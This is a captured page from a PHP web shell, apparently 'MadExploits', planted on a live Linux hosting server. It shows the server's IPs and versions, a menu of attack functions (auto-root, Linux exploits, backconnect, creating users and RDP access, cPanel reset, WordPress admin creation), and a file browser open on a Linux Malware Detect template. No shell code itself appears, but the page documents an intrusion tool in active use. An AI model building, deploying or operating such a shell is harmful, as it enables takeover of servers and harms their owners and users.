Linux eyewebsolution.dnshostserver.in 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Apache
: 185.131.55.234 | : 216.73.216.138
674 Domain
5.6.40
omxrelocation
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
maldetect.bk1071 /
internals /
[ HOME SHELL ]
Name
Size
Permission
Action
VERSION.hash
64
B
-rw-r--r--
compat.conf
3.83
KB
-rw-r--r--
functions
85.06
KB
-rw-r--r--
hexfifo.pl
1.38
KB
-rw-r--r--
hexstring.pl
644
B
-rw-r--r--
importconf
14.81
KB
-rw-r--r--
internals.conf
4.29
KB
-rw-r--r--
panel_alert.etpl
2.12
KB
-rw-r--r--
scan.etpl
2.29
KB
-rw-r--r--
tlog
2.44
KB
-rwxr-x---
Delete
Unzip
Zip
${this.title}
Close
Code Editor : scan.etpl
if [ -z "$type" ]; then type=scan fi cat > $tmpf <<EOF HOST: $HOSTNAME SCAN ID: $scanid STARTED: $scan_start_hr EOF if [ ! "$type" == "digest" ]; then cat >> $tmpf <<EOF COMPLETED: $scan_end_hr ELAPSED: ${scan_et}s [find: ${file_list_et}s] EOF else cat >> $tmpf <<EOF MODE: inotify digest ELAPSED: $inotify_run_time EOF fi if [ "$spath" ]; then echo "PATH: $hrspath" >> $tmpf fi if [ "$days" ] && [ ! "$days" == "all" ]; then echo "RANGE: $days days" >> $tmpf fi cat >> $tmpf <<EOF TOTAL FILES: $tot_files TOTAL HITS: $tot_hits TOTAL CLEANED: $tot_cl EOF if [ "$quarantine_hits" == "0" ] && [ ! "$tot_hits" == "0" ]; then echo "WARNING: Automatic quarantine is currently disabled, detected threats are still accessible to users!" >> $tmpf echo "To enable, set quarantine_hits=1 and/or to quarantine hits from this scan run:" >> $tmpf echo -e "/usr/local/sbin/maldet -q $datestamp.$$\n" >> $tmpf fi if [ "$quarantine_clean" == "1" ]; then if [ "$type" == "scan" ] && [ -f "$sessdir/clean.$$" ] && [ ! -z "$(cat $sessdir/clean.$$)" ]; then cleaned_list="$sessdir/clean.$$" elif [ "$type" == "digest" ] && [ -f "$tmpdir/.digest.clean.hits" ] && [ ! "$tot_cl" == "0" ]; then cleaned_list="$tmpdir/.digest.clean.hits" fi if [ -f "$cleaned_list" ]; then cat >> $tmpf <<EOF CLEANED & RESTORED FILES: $(cat $cleaned_list) EOF fi if [ "$quarantine_suspend_user" == "1" ]; then if [ -f "$sessdir/suspend.users.$$" ] && [ ! -z "$(cat $sessdir/suspend.users.$$)" ]; then suspended_list="$sessdir/suspend.users.$$" elif [ "$type" == "digest" ] && [ -f "$tmpdir/.digest.susp.hits" ] && [ ! "$tot_susp" == "0" ]; then suspended_list="$tmpdir/.digest.susp.hits" fi if [ -f "$suspended_list" ]; then cat >> $tmpf <<EOF SUSPENDED ACCOUNTS: $(cat "$suspended_list") EOF fi fi fi if [ ! "$tot_hits" == "0" ]; then if [ "$type" == "digest" ]; then hitlist_file="$tmpdir/.digest.alert.hits" else hitlist_file="$scan_session" fi if [ -f "$hitlist_file" ]; then echo "FILE HIT LIST:" >> $tmpf if [ "$coltest" ]; then cat $hitlist_file | column -s ':' -t -o ':' >> $tmpf else cat $hitlist_file >> $tmpf fi fi fi cat >> $tmpf <<EOF =============================================== Linux Malware Detect v$ver < proj@rfxn.com > EOF
Close